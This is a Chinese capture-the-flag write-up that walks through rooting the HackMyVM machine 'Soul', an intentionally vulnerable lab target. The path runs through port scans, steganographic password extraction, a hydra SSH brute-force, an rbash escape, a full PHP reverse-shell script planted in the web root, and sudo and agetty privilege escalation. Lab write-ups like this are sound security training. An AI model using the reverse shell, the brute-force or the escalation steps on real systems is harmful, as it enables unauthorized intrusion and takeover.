tags:
- HMV
- rbash绕过
- 图片隐写
- PHP配置解析
1. 基本信息^toc
文章目录
- 1. 基本信息^toc
- 2. 信息收集
- 3. 图片解密
- 3.1. 爆破用户名
- 3.2. 绕过rbash
- 3.3. 提权检测
- 4. 获取webshell
- 4.1. 修改php配置
- 5. www-data提权gabriel
- 6. gabriel提取到Peter
- 7. Peter提权root
靶机链接 https://hackmyvm.eu/machines/machine.php?vm=Soul
作者 sml
难度 ⭐️⭐️⭐️⭐️⭐️
2. 信息收集
端口扫描
┌──(pwncat-env)─(root㉿kali)-[/home/kali/hmv/Soul]
└─# nmap 192.168.80.10 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-02 12:08 CST
Nmap scan report for 192.168.80.10
Host is up (0.00016s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:FC:DB:8A (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 1.88 seconds
┌──(pwncat-env)─(root㉿kali)-[/home/kali/hmv/Soul]
└─# fscan -h 192.168.80.10
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
192.168.80.10:80 open
192.168.80.10:22 open
[*] alive ports len is: 2
目录扫描
┌──(root㉿kali)-[/home/kali/hmv/Soul]
└─# dirsearch -u http://192.168.80.10/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/kali/hmv/Soul/reports/http_192.168.80.10/__24-12-02_12-10-03.txt
Target: http://192.168.80.10/
[12:10:03] Starting:
[12:10:20] 200 - 9B - /robots.txt
┌──(pwncat-env)─(root㉿kali)-[/home/kali/hmv/Soul]
└─# gobuster dir -u http://192.168.80.10 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x jpg,php,html,png,zip,txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.80.10
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: jpg,php,html,png,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 24]
/robots.txt (Status: 200) [Size: 9]
/saint.jpg (Status: 200) [Size: 190523]
Progress: 1453501 / 1453508 (100.00%)
===============================================================
Finished
===============================================================
网页信息
┌──(root㉿kali)-[/home/kali/hmv/Soul]
└─# curl http://192.168.80.10/
<img src="saint.jpg">
┌──(root㉿kali)-[/home/kali/hmv/Soul]
└─# curl http://192.168.80.10/robots.txt
/nothing
┌──(root㉿kali)-[/home/kali/hmv/Soul]
└─# curl -o saint.jpg http://192.168.80.10/saint.jpg
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 186k 100 186k 0 0 118M 0 --:--:-- --:--:-- --:--:-- 181M
saint.jpg
到此 我们已经基本完成信息收集
目前得到的有
- 图片
saint.jpg - 首页
<img src="saint.jpg"> - 关键词
saint
下一步我们大概有这几种方式进行
- 解密图片。看图片里面是否存在可用信息
- 利用关键词作为用户名进行ssh爆破
3. 图片解密
既然给我们的东西很少,且只有一张图。那么这张图多半是有东西的
利用[[…/…/26-工具使用/StegSeek使用|stegseek]]工具解密
┌──(pwncat-env)─(root㉿kali)-[/home/kali/hmv/Soul]
└─# stegseek saint.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: ""
[i] Original filename: "pass.txt".
[i] Extracting to "saint.jpg.out".
the file "saint.jpg.out" does already exist. overwrite ? (y/n)
y
┌──(pwncat-env)─(root㉿kali)-[/home/kali/hmv/Soul]
└─# cat saint.jpg.out
lionsarebigcats
获取到一个关键字符串 lionsarebigcats
尝试利用这个作为密码,将 saint 作为用户名进行登录。但是失败了
可能是用户名错误了
3.1. 爆破用户名
爆破一下用户名
┌──(root㉿kali)-[/home/kali/hmv/Soul]
└─# hydra -L /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -p lionsarebigcats 192.168.80.10 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-02 12:43:58
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 8295455 login tries (l:8295455/p:1), ~518466 tries per task
[DATA] attacking ssh://192.168.80.10:22/
[22][ssh] host: 192.168.80.10 login: daniel password: lionsarebigcats
成功获取到用户名 daniel
ssh上来后发现我们在是一个限制模式的bash rbash,在这个模式下我们许多命令都用不了 比如cd命令
Last login: Thu Nov 26 05:27:42 2020 from 192.168.1.58
daniel@soul:~$ whoami
daniel
daniel@soul:~$ di
-rbash: di: command not found
daniel@soul:~$ id
uid=1000(daniel) gid=1000(daniel) groups=1000(daniel),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
daniel@soul:~$ cd /hotm
-rbash: cd: restricted
3.2. 绕过rbash
这篇文章里面有很多种[[…/渗透姿势库/rbash绕过|rbash绕过]]方式
https://www.freebuf.com/vuls/376922.html
daniel@soul:~$ awk 'BEGIN {system("/bin/bash")}'
daniel@soul:~$ /
bash: /: Is a directory
3.3. 提权检测
利用Linpeas进行提权检测
检测出/usr/sbin/agetty 很有可能
但我们这个用户用不了
daniel@soul:/tmp$ /usr/sbin/agetty -o -p -l /bin/sh -a root tty
bash: /usr/sbin/agetty: Permission denied
看来要转移到peter用户才行
4. 获取webshell
在用户目录里面没有看到可以利用的东西
可以去网站目录看一下
发现很奇怪的一点,网址目录的权限是777
drwxrwxrwx 2 root root 4096 Nov 26 2020 .
drwxr-xr-x 3 root root 4096 Nov 26 2020 ..
-rwxrwxrwx 1 root root 24 Nov 26 2020 index.html
-rwxrwxrwx 1 root root 612 Nov 26 2020 index.nginx-debian.html
-rwxrwxrwx 1 root root 9 Nov 26 2020 robots.txt
-rwxrwxrwx 1 daniel daniel 190523 Nov 26 2020 saint.jpg
应该是希望我们往这里写一个webshell
往里面写入一个webshell
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '127.0.0.1'; // CHANGE THIS
$port = 1234; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>
开启监听弹shell
发现没有弹成功。而且直接回显出了php文件的内容
说明这个php解析有问题
4.1. 修改php配置
在这个靶机上使用的是 Nginx 服务器
nginx对PHP-FPM的配置文件一般是/etc/nginx/sites-available/default
可以发现php的处理被注释掉了
但是我们当前用户也不能修改这个文件
观察配置文件可以发现这里有一个域名 lonelysoul.hmv
server {
listen 80;
listen [::]:80;
#
server_name lonelysoul.hmv;
#
root /var/www/html;
index index.html;
#
location / {
try_files $uri $uri/ =404;
}
# pass PHP scripts to FastCGI server
#
location ~ \.php$ {
include snippets/fastcgi-php.conf;
#
# # With php-fpm (or other unix sockets):
fastcgi_pass unix:/run/php/php7.3-fpm.sock;
# # With php-cgi (or other tcp sockets):
# fastcgi_pass 127.0.0.1:9000;
}
}
lonelysoul.hmv 通过 server_name 匹配到了一个专门的配置块,该配置块包含了处理 PHP 请求的规则。
location / {
try_files $uri $uri/ =404;
}
在默认服务器块(
default_server)的配置中,location /块只是尝试将请求作为文件或目录来查找,并没有将.php文件请求转发给 PHP-FPM,所以默认服务器块无法解析 PHP 文件,只会返回 404 错误
配置etc/hosts
vim /etc/hosts
192.168.80.10 lonelysoul.hmv
开启监听弹shell
nc -lvnp 1234
curl http://lonelysoul.hmv/shell.php
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data
5. www-data提权gabriel
提权检测一下
sudo -l
Matching Defaults entries for www-data on soul:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on soul:
(gabriel) NOPASSWD: /tmp/whoami
提示我们可以用 gabriel 用户的权限执行 /tmp/whoami
那我们将bash复制到/tmp 并改名whoami 即可获取到gabriel用户的bash
cp /bin/bash /tmp/whoami
sudo -u gabriel /tmp/whoami
whoami
gabriel
成功获取到 gabriel 用户
gabriel@soul:~$ cat user.txt
HMViwazhere
6. gabriel提取到Peter
检测一下
sudo -l
Matching Defaults entries for gabriel on soul:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User gabriel may run the following commands on soul:
(peter) NOPASSWD: /usr/sbin/hping3
我们可以用 peter 的权限执行 /usr/sbin/hping3
gabriel@soul:~$ sudo -u peter /usr/sbin/hping3
hping3> /bin/bash
peter@soul:/home/gabriel$
7. Peter提权root
获取到了Peter用户权限 那么我们就可以用 agetty 提权了
/peter@soul:/home/gabriel$ /usr/sbin/agetty -o -p -l /bin/sh -a root tty
Debian GNU/Linux 10 soul tty
soul login: root (automatic login)
\[\e]0;\u@\h: \w\a\]\u@\h:\w$
\[\e]0;\u@\h: \w\a\]\u@\h:\w$ id
uid=1002(peter) gid=1002(peter) euid=0(root) groups=1002(peter)
\[\e]0;\u@\h: \w\a\]\u@\h:\w$ whoami
root
cat /root/rootflag.txt
HMVohmygod
